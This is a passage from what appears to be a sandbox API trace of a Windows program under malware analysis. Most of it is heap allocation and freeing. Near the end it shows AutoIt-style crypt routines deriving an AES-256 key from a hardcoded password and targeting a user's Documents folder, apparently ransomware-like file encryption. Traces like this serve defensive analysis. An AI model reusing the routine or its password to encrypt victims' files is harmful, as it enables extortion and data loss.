hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0084.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4838 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0084.040] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.040] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.040] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0084.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431ded8 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0084.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0084.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca598, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0084.043] CloseHandle (hObject=0x258) returned 1 [0084.046] FreeLibrary (hLibModule=0x772d0000) returned 1 [0084.046] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0084.046] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 0x41ac700 [0084.046] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0084.047] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.047] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0084.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0084.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0084.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0084.047] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4838) returned 1 [0084.048] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0084.048] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.048] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0084.048] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.048] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.049] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.049] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0084.049] CryptCreateHash (in: hProv=0x41a4838, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0084.049] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0084.049] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0084.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0084.049] CryptHashData (hHash=0x41ac500, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0084.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.050] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0084.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cacd0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0084.050] CryptDeriveKey (in: hProv=0x41a4838, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0084.053] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0084.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0084.053] CryptDestroyHash (hHash=0x41ac500) returned 1 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0084.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0084.054] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0084.054] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0084.054] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 